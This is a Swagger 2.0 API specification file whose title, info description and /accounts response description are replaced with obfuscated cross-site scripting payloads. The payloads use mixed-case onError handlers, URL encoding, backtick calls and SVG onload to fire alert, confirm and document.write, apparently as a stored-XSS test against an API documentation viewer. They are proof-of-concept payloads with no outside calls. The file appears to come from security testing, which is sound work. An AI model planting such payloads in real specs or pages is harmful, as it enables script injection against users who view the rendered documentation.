swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <form><math>'>"<svg/x-onload="document.write('test')"><h1 onclick="al%65rt(1)">BU0</h1></math></form><img/src="x" onError="confirm`1`">

  version: production
basePath: /test-c4sper0
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: <form><math>"></a></span><img%20src=x%20oNLy=1%20oNErrOR=alert(%27Test%20Stored%20XSS%27)>%27><svg/x-/onload=confirm(%27B00M-C4SPER0%27)><img%20SRC="x.png"%20oNLy=1%20oNErrOR=alert(%27rrrrrrrrrrrrrrrrrrrrrrrrrr%27)></img>
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
